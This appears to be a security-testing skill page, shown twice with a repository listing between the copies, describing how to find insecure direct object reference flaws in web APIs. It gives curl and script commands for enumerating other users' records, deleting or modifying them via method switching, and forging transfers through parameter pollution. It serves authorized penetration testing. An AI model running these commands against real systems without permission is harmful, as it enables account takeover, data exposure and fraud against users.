name	attack-idor-automation
description	IDOR automated testing — cross-account access, horizontal/vertical privilege escalation, mass data exposure
category	web-application
version	1.0
author	cyberstrike-official
tags	["idor","bac","access-control","web","attack"]
tech_stack	["web"]
cwe_ids	["CWE-639","CWE-284"]
chains_with	["attack-jwt","attack-graphql"]
prerequisites	[]
severity_boost	{"attack-jwt":"JWT tamper + IDOR = full account takeover"}

IDOR Automated Testing

Objective

Systematically test all API endpoints for Insecure Direct Object Reference vulnerabilities using two accounts with different privilege levels.

Testing Methodology

Phase 1: Set Up Two Accounts

Account A (victim) — owns resources being tested
Account B (attacker) — tries to access Account A's resources

Phase 2: Automated Cross-Account Testing

# Test endpoints from file
attack_script idor_tester \
  --token-a "VICTIM_JWT" \
  --token-b "ATTACKER_JWT" \
  --endpoints endpoints.txt \
  --json-output

# Test comma-separated endpoints
attack_script idor_tester \
  --token-a "VICTIM_JWT" \
  --token-b "ATTACKER_JWT" \
  --endpoints "https://TARGET/api/users/123,https://TARGET/api/orders/456,https://TARGET/api/profile/123" \
  --method GET

# Test write operations
attack_script idor_tester \
  --token-a "VICTIM_JWT" \
  --token-b "ATTACKER_JWT" \
  --endpoints endpoints.txt \
  --method PUT \
  --data '{"name":"pwned"}'

Phase 3: Manual Testing Patterns

Horizontal IDOR (same role, different user):

# Sequential IDs
curl -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/1
curl -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/2

# UUID guessing (if predictable)
curl -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/UUID_OF_OTHER_USER

# Endpoint enumeration
for id in $(seq 1 100); do
  curl -s -o /dev/null -w "%{http_code} " -H "Authorization: Bearer ATTACKER_TOKEN" "https://TARGET/api/orders/$id"
done

Vertical IDOR (low-priv accessing high-priv):

# User accessing admin endpoints
curl -H "Authorization: Bearer USER_TOKEN" https://TARGET/api/admin/users
curl -H "Authorization: Bearer USER_TOKEN" https://TARGET/api/admin/settings
curl -H "Authorization: Bearer USER_TOKEN" https://TARGET/api/internal/reports

Phase 4: HTTP Method Switching

# GET blocked but DELETE works
curl -X DELETE -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/VICTIM_ID

# GET blocked but PATCH works
curl -X PATCH -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/VICTIM_ID \
  -d '{"email":"attacker@evil.com"}'

Phase 5: Parameter Pollution

# Dual ID injection
curl "https://TARGET/api/profile?user_id=ATTACKER&user_id=VICTIM"

# Body override
curl -X POST https://TARGET/api/transfer \
  -H "Authorization: Bearer ATTACKER_TOKEN" \
  -d '{"from":"VICTIM_ID","to":"ATTACKER_ID","amount":1000}'

Phase 6: Response Comparison

# Compare responses between two auth contexts
attack_script response_diff "https://TARGET/api/users/VICTIM_ID" \
  --header-a "Authorization:Bearer VICTIM_TOKEN" \
  --header-b "Authorization:Bearer ATTACKER_TOKEN" \
  --json-output

What Constitutes a Finding

Finding	Severity
Read other user's PII (email, SSN, etc.)	Critical (P1)
Modify other user's data	Critical (P1)
Delete other user's resources	Critical (P1)
Access admin functionality	Critical (P1)
Read non-sensitive data of other user	Medium (P3)

Evidence Requirements

Two different auth tokens used
Endpoint tested
Account A (victim) response as baseline
Account B (attacker) accessing Account A's resource
Data received proving cross-account access

Tools

attack_script idor_tester — automated cross-account testing
attack_script response_diff — response comparison
attack_script jwt_tamper — token manipulation for IDOR

References

同仓库更多 Skills

同仓库

attack-cache-poison

CyberStrikeus/CyberStrike

Web cache poisoning — unkeyed header/parameter injection to serve malicious content to all users

2026-06-01334

attack-cors

CyberStrikeus/CyberStrike

CORS misconfiguration testing — origin reflection, wildcard bypass, null origin, credential leakage

2026-06-01334

attack-graphql

CyberStrikeus/CyberStrike

GraphQL vulnerability testing — introspection exposure, complexity DoS, batch abuse, mutation auth bypass

2026-06-01334

attack-host-header

CyberStrikeus/CyberStrike

Host header injection — password reset poisoning, cache poisoning, routing bypass, SSRF via Host

2026-06-01334

attack-jwt

CyberStrikeus/CyberStrike

JWT token attacks — alg:none bypass, key confusion, claim tampering, signature stripping

2026-06-01334

attack-open-redirect

CyberStrikeus/CyberStrike

Open redirect exploitation — URL parameter manipulation, OAuth token theft, phishing chains

2026-06-01334

name	attack-idor-automation
description	IDOR automated testing — cross-account access, horizontal/vertical privilege escalation, mass data exposure
category	web-application
version	1.0
author	cyberstrike-official
tags	["idor","bac","access-control","web","attack"]
tech_stack	["web"]
cwe_ids	["CWE-639","CWE-284"]
chains_with	["attack-jwt","attack-graphql"]
prerequisites	[]
severity_boost	{"attack-jwt":"JWT tamper + IDOR = full account takeover"}

IDOR Automated Testing

Objective

Systematically test all API endpoints for Insecure Direct Object Reference vulnerabilities using two accounts with different privilege levels.

Testing Methodology

Phase 1: Set Up Two Accounts

Account A (victim) — owns resources being tested
Account B (attacker) — tries to access Account A's resources

Phase 2: Automated Cross-Account Testing

# Test endpoints from file
attack_script idor_tester \
  --token-a "VICTIM_JWT" \
  --token-b "ATTACKER_JWT" \
  --endpoints endpoints.txt \
  --json-output

# Test comma-separated endpoints
attack_script idor_tester \
  --token-a "VICTIM_JWT" \
  --token-b "ATTACKER_JWT" \
  --endpoints "https://TARGET/api/users/123,https://TARGET/api/orders/456,https://TARGET/api/profile/123" \
  --method GET

# Test write operations
attack_script idor_tester \
  --token-a "VICTIM_JWT" \
  --token-b "ATTACKER_JWT" \
  --endpoints endpoints.txt \
  --method PUT \
  --data '{"name":"pwned"}'

Phase 3: Manual Testing Patterns

Horizontal IDOR (same role, different user):

# Sequential IDs
curl -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/1
curl -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/2

# UUID guessing (if predictable)
curl -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/UUID_OF_OTHER_USER

# Endpoint enumeration
for id in $(seq 1 100); do
  curl -s -o /dev/null -w "%{http_code} " -H "Authorization: Bearer ATTACKER_TOKEN" "https://TARGET/api/orders/$id"
done

Vertical IDOR (low-priv accessing high-priv):

# User accessing admin endpoints
curl -H "Authorization: Bearer USER_TOKEN" https://TARGET/api/admin/users
curl -H "Authorization: Bearer USER_TOKEN" https://TARGET/api/admin/settings
curl -H "Authorization: Bearer USER_TOKEN" https://TARGET/api/internal/reports

Phase 4: HTTP Method Switching

# GET blocked but DELETE works
curl -X DELETE -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/VICTIM_ID

# GET blocked but PATCH works
curl -X PATCH -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/VICTIM_ID \
  -d '{"email":"attacker@evil.com"}'

Phase 5: Parameter Pollution

# Dual ID injection
curl "https://TARGET/api/profile?user_id=ATTACKER&user_id=VICTIM"

# Body override
curl -X POST https://TARGET/api/transfer \
  -H "Authorization: Bearer ATTACKER_TOKEN" \
  -d '{"from":"VICTIM_ID","to":"ATTACKER_ID","amount":1000}'

Phase 6: Response Comparison

# Compare responses between two auth contexts
attack_script response_diff "https://TARGET/api/users/VICTIM_ID" \
  --header-a "Authorization:Bearer VICTIM_TOKEN" \
  --header-b "Authorization:Bearer ATTACKER_TOKEN" \
  --json-output

What Constitutes a Finding

Finding	Severity
Read other user's PII (email, SSN, etc.)	Critical (P1)
Modify other user's data	Critical (P1)
Delete other user's resources	Critical (P1)
Access admin functionality	Critical (P1)
Read non-sensitive data of other user	Medium (P3)

Evidence Requirements

Two different auth tokens used
Endpoint tested
Account A (victim) response as baseline
Account B (attacker) accessing Account A's resource
Data received proving cross-account access

Tools

attack_script idor_tester — automated cross-account testing
attack_script response_diff — response comparison
attack_script jwt_tamper — token manipulation for IDOR